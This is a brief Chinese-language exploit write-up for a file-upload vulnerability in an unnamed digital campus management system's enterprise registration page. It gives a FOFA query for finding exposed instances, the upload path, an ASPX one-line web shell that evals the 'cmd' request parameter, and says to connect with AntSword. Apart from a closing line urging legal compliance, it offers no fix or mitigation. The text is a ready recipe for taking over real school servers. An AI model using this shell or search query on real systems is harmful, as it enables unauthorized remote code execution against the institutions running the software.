# 某数字化校园综合管理系统 - 文件上传 getshell
# 漏洞简介
系统前台企业注册页面存在恶意文件上传漏洞
# 资产查找
FOFA:
1
| body="DC_Login/QYSignUp"
|
# 漏洞复现
点击企业注册
不存在这个链接可直接尝试访问 /DC_Login/QYSignUp
目录
选择上传附件,直接上传 aspx 一句话木马
1
| <% @Page Language="Jscript"%><%eval(Request.Item["cmd"],"nice!");%>
|
成功上传
蚁剑连接
各位白帽子应严格遵守中华人民共和国相关法律法规 。